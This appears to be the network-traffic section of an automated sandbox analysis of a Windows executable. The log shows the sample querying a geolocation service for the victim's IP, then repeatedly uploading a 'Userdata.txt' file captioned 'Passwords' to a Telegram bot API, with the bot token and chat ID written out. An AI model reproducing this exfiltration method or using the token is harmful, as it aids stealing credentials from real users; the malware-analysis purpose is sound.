                                                                                                            Data Ascii: %&i*uhh0[_q5o"Z@a6=~@!y3,(e]tG@./V>iu^'sa64SCxnN&S;BuAS)s:TZv"L#L31)?waLjia!;t\W&9_Jk;{Cv
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: bb 59 2c a0 c4 d1 46 0e f9 d8 4a 7a 77 88 ee 5c 27 70 2b a9 82 38 f3 4c cb 83 b6 a8 b3 3e 90 12 35 59 76 89 1a 7b 0d 43 46 aa 32 32 10 5e 01 3b 35 3d 9f cb 1b fc f9 17 57 01 7c 10 e3 92 05 9f d3 63 f5 21 06 09 95 6f 67 4a 6f d5 0c 55 da cd ee ff 00 2d 9e c9 89 b5 51 8a d0 71 25 f2 d6 88 25 38 3b c6 1a d3 8e 37 39 10 2b 44 92 df 4c a7 01 75 f2 af 21 22 cf 01 92 9a 67 1a 88 07 84 64 38 a7 b5 36 2b 38 f0 bf 4b b4 05 64 51 96 d1 c8 cd 02 7f 71 68 1c 26 89 9b 78 da fb 0f 5a 1e d6 e3 b8 a8 2d 0e 35 d8 fe 53 3a 03 02 15 0c ac 93 ca e7 e9 b5 d9 a9 b7 62 ca 77 9e 7e a3 ab 04 b1 33 fb d3 d6 5d 4d 14 cc 59 cd b7 fd f0 21 fc 9a f2 88 91 7b 89 80 2a f1 36 39 2b b4 0e e0 01 11 a3 81 32 c9 4a 8f 5c 36 10 37 b3 07 c2 b0 c6 ef 01 81 68 35 cc 51 8b 57 10 f8 48 71 39 e4 e8
                                                                                                            Data Ascii: Y,FJzw\'p+8L>5Yv{CF22^;5=W|c!ogJoU-Qq%%8;79+DLu!"gd86+8KdQqh&xZ-5S:bw~3]MY!{*69+2J\67h5QWHq9
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: cd 39 88 87 27 ae 6a 73 66 43 35 a1 6b 33 5b f5 b9 93 99 e6 3e a7 03 6e 64 36 20 5c d5 61 2d 93 1f 79 e1 d7 b3 a9 9f 09 30 45 ed aa 62 f7 49 a5 4b 58 1c 66 c7 3b 7f 81 51 38 54 05 48 c0 f7 97 b1 27 d7 ae 92 51 af f4 62 cf 30 92 db 24 73 6a 68 f1 98 5d 4a 22 92 2a 95 35 ea 9c bd 5e 7a 41 c0 f9 f5 72 05 c9 f3 1b ea e3 da cf d2 64 51 a2 db f2 a0 f0 6c d6 6c 5d 97 ee 62 cd 50 25 af 16 38 a1 83 1b 27 8c 4f b4 8f 48 13 1b f4 c5 b1 54 e1 cc b4 77 34 0d 89 9a de 6f b3 f4 0b 49 0f 9a 4e 59 03 e1 c9 07 22 ec c9 3a c7 4e b9 27 58 85 5f 43 fb d9 2d 83 14 27 a6 ad b3 bc 9c b3 26 bf 77 56 83 61 de 1c a5 47 aa 38 27 6e f7 0e 3b 33 35 86 b4 69 ae f9 67 32 53 73 10 e5 b0 0d f0 11 64 e2 f1 02 d4 97 6e 60 5f 56 0d e5 ab 25 cd e6 30 17 7a de e6 89 c5 34 4c de 71 0b ad de 99
                                                                                                            Data Ascii: 9'jsfC5k3[>nd6 \a-y0EbIKXf;Q8TH'Qb0$sjh]J"*5^zArdQll]bP%8'OHTw4oINY":N'X_C-'&wVaG8'n;35ig2Ssdn`_V%0z4Lq
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: f5 43 7d 2e 3d 13 68 d9 01 c3 de 20 3f e0 fc 4d 6a 27 fa bd 37 31 dd 3e 44 79 70 e8 4d 52 5a fc 55 a9 f9 43 0f cd ac 0e 63 99 dd 33 e6 6d dd ed 7d 34 40 9b b3 95 2f 27 91 fa 23 ae 92 bf 3a d1 95 ed cb f5 ac 74 ec 6d 89 b4 6f f2 6a 76 3d c8 05 5d ad d1 ad 09 ad 64 5c 2c 64 9d e9 e0 9b a0 51 f2 c6 b2 e2 43 66 a3 1f 27 3d f6 04 84 19 de 2f 8d c1 a7 11 50 08 e3 2f 24 b0 e2 bb eb c0 fe f9 e8 e4 6b f2 45 f8 ff 41 e7 ff ca 01 9f 96 20 2e 46 41 f6 e9 0c ab 1f 6e b2 13 d3 db 4e 57 cb 2a 81 8d 1f 86 29 09 4f 40 34 92 61 5c 4e f4 a6 85 de 3b 3f a7 03 34 c3 15 20 2a ee 26 3c 9a 01 8d e0 c2 91 40 95 1f c4 4f f9 98 35 fd 65 b3 65 81 cb 66 cd 2c 76 e6 7c 62 48 0f 29 a6 0d 02 b1 21 f7 b5 f8 82 af f4 4f f8 ea a9 77 32 60 67 58 f7 9e 2f d6 36 83 5d 88 88 f6 9c cb 5e f0 41
                                                                                                            Data Ascii: C}.=h ?Mj'71>DypMRZUCc3m}4@/'#:tmojv=]d\,dQCf'=/P/$kEA .FAnNW*)O@4a\N;?4 *&<@O5eef,v|bH)!Ow2`gX/6]^A
                                                                                                            2025-01-10 21:31:32 UTC1390INData Raw: 77 eb 91 bb 0a d9 99 f4 d1 ff e2 a6 f8 b6 87 72 6f be 70 70 e1 53 60 5d cf 02 0f d4 2c cd 2a 9b 79 49 e7 67 36 d1 0d 93 6f 9d 25 79 7b c0 74 0c b6 e1 b4 9d b6 f0 4a fd 3b a3 a2 cb f9 c7 a9 c8 0b 9f 67 34 b7 95 ca fb db 99 e6 3c 3a 36 c4 f3 9a c5 7b e3 6f 89 cd c0 a3 f7 2a bf af 05 73 cc 76 34 ea 23 e9 94 04 f8 de de 17 e9 13 18 87 77 1b b7 ab bb cf dc 1f 88 dc 6e 44 f7 35 0c e8 6e be 8e 54 34 f3 00 6a f8 ef c5 2e ab d2 93 8b 73 8e f7 45 40 1c be a0 75 3f 58 84 d1 7c 27 27 f5 6b 9e 38 15 94 7b d1 1a dd 0c 60 66 db f3 5d 66 01 d8 a4 bb 0e d7 51 40 5d 66 90 83 d2 5a 8c f1 9f e7 5b a4 fc 4a 7d 5c 86 cc 49 52 b6 c5 ef 72 87 6e ad d7 fb 90 27 e1 52 17 b0 ec e5 98 f4 83 8e 09 ff 39 04 4e 43 3a b1 6f f8 79 50 63 c7 2d f7 a9 c0 aa 29 f2 63 2e ba f8 92 99 8f 4a a0
                                                                                                            Data Ascii: wroppS`],*yIg6o%y{tJ;g4<:6{o*sv4#wnD5nT4j.sE@u?X|''k8{`f]fQ@]fZ[J}\IRrn'R9NC:oyPc-)c.J


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.349980104.21.80.14438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:35 UTC855INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:35 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1859484
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLntxPHb9%2BGP1Qizb1Urgd2NXZ5jS6fzgt9SzPS54d0WGTRA9FoGgx7ijczFPU8X%2F2Ll7FO9e4AJLVl4j9DA8GZIvscR65mKl1Jke9nSMe5JQ4XmUZ6TX9%2B57ZYZE4u230XvO2uD"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8fffc65bdfd18c0f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2066&rtt_var=788&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1378008&cwnd=223&unsent_bytes=0&cid=cab0b8f2fe26b0b8&ts=150&x=0"
                                                                                                            2025-01-10 21:31:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.349981149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:42 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd319443444d0b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 34 34 33 34 34 34 64 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd319443444d0bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:42 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:42 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:42 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43574,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544702,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.349983149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:44 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31aa95a100c4
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 61 39 35 61 31 30 30 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31aa95a100c4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:44 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 543
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:44 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43575,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544704,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.349986149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:46 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31c0d732686b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 21:31:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 30 64 37 33 32 36 38 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31c0d732686bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 543
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:46 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43576,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544706,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.349988149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:47 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31d7081d0af9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 37 30 38 31 64 30 61 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31d7081d0af9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:48 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:47 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:48 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43577,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544707,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.349990149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:49 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31e63d9f7e32
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 36 33 64 39 66 37 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31e63d9f7e32Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:49 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:49 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
